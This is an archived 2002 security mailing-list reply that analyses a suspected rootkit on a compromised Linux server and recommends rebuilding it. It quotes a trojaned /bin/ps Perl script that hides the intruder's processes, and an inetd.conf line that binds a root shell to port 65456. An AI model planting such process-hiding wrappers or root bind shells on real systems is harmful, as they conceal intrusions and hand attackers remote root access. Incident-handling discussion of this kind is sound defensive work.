Re: nouser - rootkit ?

From: Eric Brandwine (ericbat_private)
Date: Mon Mar 11 2002 - 09:57:38 PST

Next message: Kurt Seifried: "Re: HTTPS scans"

Previous message: Ryan Russell: "RE: Port UDP 3049"
Next in thread: Ryan Russell: "Re: nouser - rootkit ?"
Reply: Ryan Russell: "Re: nouser - rootkit ?"
Reply: Konrad Rieck: "Re: nouser - rootkit ?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

>>>>> "du" == Dan Uscatu <duscatuat_private> writes:

du>  [root@www /root]# cat /bin/ps
du>  #!/usr/bin/perl
du>  $xargs =join(' ',@ARGV);
du>  $ps = `/usr/lib/libxnotps $xargs \| grep -v nouser \| grep -v noshell \|
du>  grep -v proftp \| grep -v \"/bin/ps\" \| grep -v libxnotps`;
du>  print "$ps";

WOW!  That is really lame!  It may qualify as the first cross-platform
root kit I've ever seen though ;)

This moron clearly does not know how to use perl regexps (among many
other things).  At least use fgrep!

du> i have scanned the machine using chkroot kit... the only funny thing found
du> was an inetd.conf, containing:

du>  [root@www nouser]# cat /etc/inetd.conf
du> 65456    stream  tcp     nowait  root  /bin/sh     sh

du>  of course, inetd is not installed :) that points me to the idea that the
du> process was somehow automated... but i cant find any reference to a rootkit
du> that does these changes. seems pretty stupid for a rootkit  anyway... but i
du> want to be sure no other major changes were made... before i install the
du> production server there.

This looks like a clueless kiddie cobbled together a bunch of stuff he
found on the net, and packaged it up.

Either it's a red herring, and the real root kit is much better
hidden, or it'll be almost trivial to clean up.  But you've no way of
knowing.  I'd rebuild the box from scratch, if it were mine.

Of much more importance is how he got in.  Scrape this loser off your
box, and another one will take his place.  And the new one might not
be quite so incompetent.

ericb
-- 
Eric Brandwine     |  Contrary to the popular belief that it's hard to recover
UUNetwork Security |  information, it's actually starting to appear that it's
ericbat_private       |  very hard to remove something even if you want to.
+1 703 886 6038    |      - Dan Farmer
Key fingerprint = 3A39 2C2F D5A0 FC7C  5F60 4118 A84A BD5D  59D7 4E3E

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Next message: Kurt Seifried: "Re: HTTPS scans"
Previous message: Ryan Russell: "RE: Port UDP 3049"
Next in thread: Ryan Russell: "Re: nouser - rootkit ?"
Reply: Ryan Russell: "Re: nouser - rootkit ?"
Reply: Konrad Rieck: "Re: nouser - rootkit ?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Mar 11 2002 - 12:37:49 PST